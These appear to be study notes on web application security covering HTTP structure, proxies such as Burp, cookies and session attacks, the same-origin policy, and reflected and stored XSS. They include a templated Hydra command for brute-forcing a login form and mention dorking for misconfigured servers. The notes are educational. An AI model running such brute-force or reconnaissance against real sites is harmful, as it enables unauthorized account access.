👈️

Web Security

The idea is to focus on the web application themselves rather than the service that runs the application. Web Application hacking requires an analysis of the implementation and functioning of the application. There are many tools that helps us to analyze a we application like google dorks, browser plugins and so on.

Google Dorks

Search engines indexes anything, using advanced query search a lot of useful information can be found (google-hacking db). Google Dorks can be used to find misconfigured web servers and application. Search engines also help to find poorly coded web pages like forms with hidden fields or coding mistakes.

Web Crawling

It's used to familiarize with the target website, offline inspection is preferred when looking for sensitive data in interesting pages like comments in dynamic pages, response headers and cookies. It can be a long process, to download a website for later offline analysis wget can be used.

Web Application assessment

First of all we need to understand how a web application work and it's components like authentication, database interaction and session management; input validation can also be a potential source of vulnerability. In general web application assessment requires proper tools like browser plugins: they can see and modify data in real-time, allowing the edit of request header and body with in-depth inspection of responses. Check individually each response header and response is useful to understand more of the application logic. Tool suites are proxys that interpose between a client and a server, the client can be whatever type of application providing all functionalities of plugins and more (burpsuite).

Common Web Application vulnerabilities

Typical vulnerabilities are weak password for login, misconfiguration, session hijacking (allow us to steal a session used by another user), XSS (allow to force a browser to execute a script), XSRF (allow to force a user to perform actions as an auth user), and finally SQL injection.

A Page request can be schematized in the following way:

An URL has a structure which describe how a request is performed and which parameters are sent to the server. Some character cant be used in URL because they have special meaning; non allowed character are: : / ? [ ] @ ! $ & ' ( ) * + , ; = because they're use is reserved. Also only printable ASCII character can be used. If it's really needed to use not allowed ASCII characters they has to be encoded with a % followed by tho hex digits.

Structure of HTTP request

An HTTP request is formed by three parts: a request line, an header and a body. Header and body are divided by a empty line and request line and header are terminated by "\r\n" (curiosity on carriage return).

Request Line

A request line is composed by three components: a method, the resource requested and the version of HTTP used. For example:

GET /index.html HTTP/1.1

Some HTTP methods are: GET, POST, DELETE, OPTION and PUT.

The header contains informations about the request itself and the requester like the hostname of the full URL accessed, Authorization infos, Referer to indicate from which page the request has been made, and the User-Agent used to perform the request. Also there can be meta-information about the request body like the Content-Length and the Content-Type.

Structure of HTTP response

An HTTP response is similar in structure to an HTTP request, it's composed by a status line an optional header an empty line and an optional body.

Status Line

The status line of an HTTP response is composed by three components: the version of the HTTP protocol used, a status code and a text code:

HTTP/1.1 200 OK

There are different classes of status codes: informational (100-199), successful (200-299), redirection (300-399), client error (400-499) and server error (500-599).

The first part of the header includes the banner of the web server running that can include modules and OS. Also can be present the location field that can be used to redirect the browser and the Content-Length and Content-Type of the body. Additional informations that can be present are Last-Modified, Expires and Pragma.

HTTP requests are used to provide dynamic contents to websites, client side scripting languages can be used to tell the browser to execute according to user behaviour. Server side scripting is used by the server to construct web pages with dynamic content.

Parameters passing using GET:

Parameters passing using POST:

HTTP Authentication

Authentication mechanism are not really used, two mechanism are implemented basic and digest.

Monitoring and manipulating HTTP

The payload in inside a TCP packet and the data is in clear text. A lot of tool can be used to sniff http traffic; with https tamper can be done using browser extensions (Tamper Data) or proxy.

HTTP proxy is a tool used to look at http traffic and modify it and are application independent. Some HTTP proxy are WebScarab, ProxPy and Burp.

Burp Suite

It is a set of tools that can be combined to perform automated or manual analysis of http traffic:

Burp and Hydra can be used together to brute-force a login form:

hydra -L <users> -P <pwds> <target_ip> http-form-post '<page>:<POST data>:S=<success_condition>'

HTTP Security

HTTP is a stateless ptotocol, so to keep in mind if a user is authenticated and logged in sessions have to be used. Normally sessions are implemented by the web application with cookies. Cookies are data created from the server and stored by the client and transmitted at each request to identify a specific user. Cookie are defined in the RFC2109, and are composed by different fields:

Session cookies are used to identify session data stored in the server, for this reason the security of the cookie itself is critical, if someone steal the cookie can bypass the authentication schema; for this reason cookies may have a short lifespan. XSS is a common technique used to steal session cookies.

Session hijacking

It is a type of attack no more possible because of HTTPS, it consisted in an attacker eavsdropping a connection to steal a session cookie of a given user. The attacker than uses the stolen cookie to access to private informations of the user. Sometimes websites force https only in the login page, but no in other sections of the web application.

Session Prediction

It was a technique used to guess the possible session ID generated by web application for a given user, the technique is explained in this video. It consisted works by exploiting the implementation of cookie generation of some programming language used server-side (PHP in the video) and using some informations about the target.

Session Fixation

This kind of attack is a smart variation of the session hijacking. The attacker will perform a request to a web server to obtain a session ID, and then via script injection will force a target user to use the same session ID to acquire further informations.

Insecure Direct Object Reference

It's not directly tied to cookies, but its used to bypass authentication checks, it can happen when an application provides direct access to objects based on user supplied input. The user can directly access to information not intended to be accessible.

Content Isolation

Modern browser do not allow content coming from a website A modify content of website coming from website B. This prevents a malicious website to run scripts that access data and functionalities of other websites. This check is done by following the same origin policy.

The implication of SOP are:

The problem with POS is that different subdomains cannot easily interact among each other. This problem can be solved in two different ways: scripts can set their top level domain as their domain control, in this way a script in app.stayerk.me can interact with example.stayerk.me; or by using the postMessage() function, that implement a message based communication between windows.

Client Side attack and Server Side attack

We can exploit the trust of the browser (XSS, CSRF) or of the server (SQL Injection, File Inclusion).

Client Side

The attacker can inject either HTML and JS, forcing a user to perform an action or steal sessoin cookie. The target is the user application, and the goal is to gain unauthorized informations; the cause of this attack is the lack of input validation. XSS can be Reflected XSS, Stored and DOM-based. Possible goals of XSS attacks are capture information of the victim, display additional or misleading informations. The attacker can also force the user to perform actions, like a SQL Injection.

Furthermore hidden additional form fields can be injected to exploit autofill feature.

Reflected XSS

In this kind of XSS attack, the attacker force the user to click on a malicious link crafted to execute a script on a vulnerable website, reflecting the effects of the script execution on the victim. The attacker can use obfuscation or encoding techniques to hide as much as possible the presence of the script to execute in the link.

Stored XSS

Some website allow users to upload content that can later be seen by other users. If the input is not correctly validated the attacker may upload malicious content, that will be stored in to the database and will be executed by any user that request that particular content. In this settings the attacker do not have to force a user to click on a malicious link, and the scope of the attack is not restricted to a single target but contains virtually all the users of that particular web application.

For those reasons, the stored xss is more dangerous than the reflected xss.

Code and explanation of the MySpace Worm by Samy Kamkar's.